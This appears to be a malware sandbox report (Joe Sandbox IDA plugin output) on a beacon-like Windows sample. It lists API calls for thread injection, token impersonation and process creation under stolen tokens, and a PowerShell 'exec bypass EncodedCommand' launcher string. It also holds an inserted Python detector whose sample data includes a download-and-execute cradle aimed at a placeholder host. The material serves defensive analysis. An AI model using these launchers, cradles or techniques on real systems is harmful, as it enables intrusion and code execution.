                                            • _invalid_parameter_noinfo.LIBCMT ref: 007D2EFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                            • String ID:
                                            • API String ID: 3318157856-3916222277
                                            • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                            • Instruction ID: 430cc0cf774ffb0b1caf2c72e0ee0063605642ec5619201b04493a0b1bc2aa6e
                                            • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                            • Instruction Fuzzy Hash: C832227270868486EB258F24D55437E7BB1F7A5794F281007DE4A17BAAEB7CC943CB40
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007823FD
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 00782402
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _fileno.LIBCMT ref: 0078242F
                                              • Part of subcall function 00784E54: _errno.LIBCMT ref: 00784E5D
                                              • Part of subcall function 00784E54: _invalid_parameter_noinfo.LIBCMT ref: 00784E68
                                            • write_multi_char.LIBCMT ref: 00782A6B
                                            • write_string.LIBCMT ref: 00782A88
                                            • write_multi_char.LIBCMT ref: 00782AA5
                                            • write_string.LIBCMT ref: 00782B04
                                            • write_string.LIBCMT ref: 00782B3B
                                            • write_multi_char.LIBCMT ref: 00782B5D
                                            • free.LIBCMT ref: 00782B71
                                            • _isleadbyte_l.LIBCMT ref: 00782C42
                                            • write_char.LIBCMT ref: 00782C58
                                            • write_char.LIBCMT ref: 00782C79
                                            • _errno.LIBCMT ref: 00782D7C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 00782D87
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                            • String ID: $@
                                            • API String ID: 3318157856-1077428164
                                            • Opcode ID: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                            • Instruction ID: 44e9f83507fa3e2cc868ae7766487011f28dde848e5975ca25f3a7d8ac94692d
                                            • Opcode Fuzzy Hash: 0917c7b026fa98026fd61c82a9db6b94b013ed73c29c4ccbf17a38093d3ada48
                                            • Instruction Fuzzy Hash: 3842357278868486EB29EF15D54437E7FA0FB45B96F244005DF4A57AA6EB3CC843CB01
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00781989
                                              • Part of subcall function 00780A00: _getptd.LIBCMT ref: 00780A16
                                              • Part of subcall function 00780A00: __updatetlocinfo.LIBCMT ref: 00780A4B
                                              • Part of subcall function 00780A00: __updatetmbcinfo.LIBCMT ref: 00780A72
                                            • _errno.LIBCMT ref: 0078198E
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _fileno.LIBCMT ref: 007819BB
                                              • Part of subcall function 00784E54: _errno.LIBCMT ref: 00784E5D
                                              • Part of subcall function 00784E54: _invalid_parameter_noinfo.LIBCMT ref: 00784E68
                                            • write_multi_char.LIBCMT ref: 00781FEB
                                            • write_string.LIBCMT ref: 00782008
                                            • _errno.LIBCMT ref: 007822F3
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007822FE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                            • String ID: -$0
                                            • API String ID: 3246410048-417717675
                                            • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                            • Instruction ID: 8f672f9bbfb781a1cd66913dfe7527e7965a2b35094aa7369b4e637737586de2
                                            • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                                            • Instruction Fuzzy Hash: A3325872B8868886EB29EF15D5483BE7B78F745795FA41005DF4A47A69DB3CC843CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                            • String ID: U
                                            • API String ID: 3902385426-4171548499
                                            • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                            • Instruction ID: d8798a136d36adb3e77a1be63bae5059b1fbb60284200ef8a6c44b8a56272216
                                            • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                                            • Instruction Fuzzy Hash: C8024372714B82C6DB20AF29E48836EB7A1F785798F900116EB8E87B54DB3DD945CB10
                                            APIs
                                            • _snprintf.LIBCMT ref: 007C7D66
                                            • _snprintf.LIBCMT ref: 007C7D83
                                            • _snprintf.LIBCMT ref: 007C7CA5
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • _snprintf.LIBCMT ref: 007C7FD8
                                            • _snprintf.LIBCMT ref: 007C8334
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                            • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                            • API String ID: 3442832105-1222817042
                                            • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                            • Instruction ID: 69b193161675a090336093c9a464cbae0bead88c368732074f3f4d9008f0a286
                                            • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                            • Instruction Fuzzy Hash: 7332B5A2618EC5D2DB258F29E0457E9A3B0FF98799F045109DF8917B21EF3CD2A6C740
                                            APIs
                                            • malloc.LIBCMT ref: 007C1C63
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                              • Part of subcall function 007BD044: malloc.LIBCMT ref: 007BD057
                                              • Part of subcall function 007BD074: htonl.WS2_32 ref: 007BD07F
                                            • GetCurrentDirectoryA.KERNEL32 ref: 007C1CDB
                                            • FindFirstFileA.KERNEL32 ref: 007C1D14
                                            • GetLastError.KERNEL32 ref: 007C1D23
                                            • free.LIBCMT ref: 007C1D5E
                                            • free.LIBCMT ref: 007C1D6B
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • FileTimeToSystemTime.KERNEL32 ref: 007C1D78
                                            • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 007C1D89
                                            • FindNextFileA.KERNEL32 ref: 007C1E46
                                            • FindClose.KERNEL32 ref: 007C1E57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                            • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                            • API String ID: 723279517-1754256099
                                            • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                            • Instruction ID: 261be703918bc21e2ab2f6076cd29ddb55acbde52726f13b23e6b568a1ad9430
                                            • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                                            • Instruction Fuzzy Hash: 8151B172708795C6DB14DF66E44479EA7A2F789B80F40402AEE4E47B59EF7CC60ACB40
                                            APIs
                                            • _snprintf.LIBCMT ref: 00777166
                                            • _snprintf.LIBCMT ref: 00777183
                                            • _snprintf.LIBCMT ref: 007770A5
                                              • Part of subcall function 0077EA3C: _errno.LIBCMT ref: 0077EA73
                                              • Part of subcall function 0077EA3C: _invalid_parameter_noinfo.LIBCMT ref: 0077EA7E
                                            • _snprintf.LIBCMT ref: 007773D8
                                            • _snprintf.LIBCMT ref: 00777734
                                            Strings
                                            • not create token: %d, xrefs: 00777657
                                            • nop -exec bypass -EncodedCommand "%s", xrefs: 007774D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                            • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                                            • API String ID: 3442832105-3652497171
                                            • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                            • Instruction ID: cc693dea2e2150d3e35d31cf02a548232563590bbb5e24a57fd4298d0a31bf12
                                            • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                                            • Instruction Fuzzy Hash: 6C32A562618E8592DF268B2DE0052E9A3B0FF997D9F449501DF8D17B25EF3CD2A6C340
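The function above formats the launcher string `nop -exec bypass -EncodedCommand "%s"`, i.e. the `%s` is replaced by a base64 blob of UTF-16LE script text and handed to powershell.exe. On an endpoint that shows up as a process-creation command line, so the natural check is to decode the blob and score the flags. The following is an added example, not code from the report or from the sample: the log lines and the script text are constructed for illustration, and the flag and cradle patterns are this example's own.

```python
"""Recover and score PowerShell launches of the shape the beacon builds.

Added example, not code from the report or the sample. The launcher format
string on this page, nop -exec bypass -EncodedCommand "%s", is filled with a
base64 blob of UTF-16LE script text. Defenders meet it as a process-creation
command line, so the helpers below decode the blob, score the flags and look
for a download cradle inside the decoded script. The log lines and the script
text are constructed for this example and are not from the sandbox run.
"""
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+"?([A-Za-z0-9+/=]+)"?', re.IGNORECASE)

FLAG_RULES = {
    "noprofile": re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE),
    "exec_bypass": re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass\b", re.IGNORECASE),
    "hidden": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE),
    "encoded": ENCODED_RE,
}
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\bIEX\b|Invoke-Expression",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script text if cmdline carries an encoded command, else None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # flag present but the payload is not valid base64 / UTF-16LE


def triage(cmdline: str) -> Dict[str, object]:
    """Score one process-creation command line."""
    flags = [name for name, rx in FLAG_RULES.items() if rx.search(cmdline)]
    script = decode_encoded_command(cmdline)
    cradle = bool(script and CRADLE_RE.search(script))
    return {
        "flags": flags,
        "script": script,
        "download_and_execute": cradle,
        # two evasion flags plus an encoded payload is exactly the launcher shape on this page
        "suspicious": len(flags) >= 3 or cradle,
    }


# Constructed sample telemetry (not from the sandbox run).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_LINES: List[str] = [
    f'powershell -nop -exec bypass -EncodedCommand "{SAMPLE_B64}"',  # the beacon's launcher shape
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",         # routine admin use
    f"powershell -w hidden -enc {SAMPLE_B64}",                          # abbreviated flag, no quotes
]


def triage_all(lines: List[str]) -> List[Dict[str, object]]:
    return [triage(line) for line in lines]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_LINES, triage_all(SAMPLE_LINES)):
        print(result["suspicious"], result["flags"], (result["script"] or "")[:60])
```

Decoding rather than matching the raw base64 matters because the same script encodes differently under any change of whitespace or casing; matching the decoded text for a download cradle survives that. Odd-length or non-base64 payloads are reported as "encoded flag present, payload unreadable", which is itself worth a look.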
                                            APIs
                                            • CreateProcessAsUserA.ADVAPI32 ref: 007C0F8F
                                            • GetLastError.KERNEL32 ref: 007C0F9D
                                            • GetLastError.KERNEL32 ref: 007C0FC1
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFE81
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFEA9
                                            • CreateProcessA.KERNEL32 ref: 007C1013
                                            • GetLastError.KERNEL32 ref: 007C101D
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C1374
                                            • GetCurrentDirectoryW.KERNEL32 ref: 007C1388
                                            • CreateProcessWithTokenW.ADVAPI32 ref: 007C13D1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                            • String ID:
                                            • API String ID: 3044875250-0
                                            • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                            • Instruction ID: 3d823781b2f7f9021bdf10c97184f0b170cab659cac6fac06d5267464f5e3b29
                                            • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                                            • Instruction Fuzzy Hash: 5C61AB32608B84C2EB24DF61E884B6A73A5F749B84F50413DEA4D83B56DF7CC995CB40
                                            APIs
                                            • malloc.LIBCMT ref: 007C924F
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • _snprintf.LIBCMT ref: 007C9267
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                            • FindFirstFileA.KERNEL32 ref: 007C9272
                                            • free.LIBCMT ref: 007C927E
                                              • Part of subcall function 007CF244: HeapFree.KERNEL32 ref: 007CF25A
                                              • Part of subcall function 007CF244: _errno.LIBCMT ref: 007CF264
                                              • Part of subcall function 007CF244: GetLastError.KERNEL32 ref: 007CF26C
                                            • malloc.LIBCMT ref: 007C92CE
                                            • _snprintf.LIBCMT ref: 007C92E6
                                            • free.LIBCMT ref: 007C930E
                                            • FindNextFileA.KERNEL32 ref: 007C9327
                                            • FindClose.KERNEL32 ref: 007C9338
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                            • String ID: %s\*
                                            • API String ID: 2620626937-766152087
                                            • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                            • Instruction ID: f481e46aa712539eabfcca5ac375743c48f928ae57152d2dc09ec4fb2f06ae7b
                                            • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                            • Instruction Fuzzy Hash: 2231C0123096C185EA159B63A818BA97B66734AFD0F88516DDFD917797CF3CE543C300
                                            APIs
                                            • RtlCaptureContext.KERNEL32 ref: 00401A84
                                            • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                                            • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                                            • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                                            • GetCurrentProcess.KERNEL32 ref: 00401B34
                                            • TerminateProcess.KERNEL32 ref: 00401B42
                                            • abort.MSVCRT ref: 00401B48
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                            • String ID: @5E
                                            • API String ID: 4278921479-727458683
                                            • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                                            • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                                            • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                                            • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                                            APIs
                                            • GetModuleHandleA.KERNEL32 ref: 007C3ACE
                                            • GetProcAddress.KERNEL32 ref: 007C3ADE
                                              • Part of subcall function 007C3984: malloc.LIBCMT ref: 007C39C2
                                              • Part of subcall function 007C3984: free.LIBCMT ref: 007C3A45
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 007C3B10
                                            • Thread32Next.KERNEL32 ref: 007C3B7A
                                            • Sleep.KERNEL32 ref: 007C3B90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                                            • String ID: NtQueueApcThread$ntdll
                                            • API String ID: 1427994231-1374908105
                                            • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                            • Instruction ID: dafb893c694cd0b7fd8575955e8994ba38ec09cd9558e8e225896361c485ac68
                                            • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                            • Instruction Fuzzy Hash: 16415A72705B4199EB20CF61E844B9D73A5BB48B88F54812DDE4D57B08EF3CCA45C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: bindclosesockethtonsioctlsocketlistensocket
                                            • String ID:
                                            • API String ID: 1767165869-0
                                            • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                            • Instruction ID: 8463aa8492730acd8ce592735602a7bfa177aaddebcbd5c42ac32c52f3d388a4
                                            • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                            • Instruction Fuzzy Hash: 2F11007170879882DB248F16E49071DB7A0F788FA4F98867DDE5A537A4CF7CE84A8700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                            • String ID:
                                            • API String ID: 3910169428-0
                                            • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                            • Instruction ID: 2d95fecc788881a661305e29bf2ba6dfbd5b18fd079b5f6b5482afd0846764c3
                                            • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                            • Instruction Fuzzy Hash: 3C11EE36725B8482D7249F21E8587993720F788BA4F504279CE2A433A1DF3CD95AC700
                                            APIs
                                              • Part of subcall function 007CDCC0: RevertToSelf.ADVAPI32 ref: 007CDCDD
                                            • LogonUserA.ADVAPI32 ref: 007CDF98
                                            • GetLastError.KERNEL32 ref: 007CDFA2
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFE81
                                              • Part of subcall function 007BFE54: MultiByteToWideChar.KERNEL32 ref: 007BFEA9
                                              • Part of subcall function 007BD044: malloc.LIBCMT ref: 007BD057
                                            • ImpersonateLoggedOnUser.ADVAPI32 ref: 007CDFC0
                                            • GetLastError.KERNEL32 ref: 007CDFCA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                                            • String ID: %s\%s
                                            • API String ID: 3621627092-4073750446
                                            • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                            • Instruction ID: 6da34dfa5c685c891bfaa0d2e662eaf862ef995ac276b57521b62fc38afa69d9
                                            • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                            • Instruction Fuzzy Hash: 2A314F20B18B45C2EB20EB62F89976A23A6F789BC0F54403DEA4E47756DF3CD945C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountSleepTick$closesocket
                                            • String ID:
                                            • API String ID: 2363407838-0
                                            • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                            • Instruction ID: 12bfdea8b90f90c7b5ccf10a087c38fdd114f709100a0e431d2201587e4bd6bf
                                            • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                            • Instruction Fuzzy Hash: 96119621704684C2DA10EB22F8597596360B789BB0F544735EEBE47BE6DE3CC5458741
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                                            • GetCurrentProcessId.KERNEL32 ref: 004019E0
                                            • GetCurrentThreadId.KERNEL32 ref: 004019E8
                                            • GetTickCount.KERNEL32 ref: 004019F0
                                            • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                                            • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                                            • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                                            • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: bindclosesockethtonslistensocket
                                            • String ID:
                                            • API String ID: 564772725-0
                                            • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                            • Instruction ID: 09e37a74339a78084a944dc0ad3f3bf8344a542eb0d4d0bf318f68f4c7d17e48
                                            • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
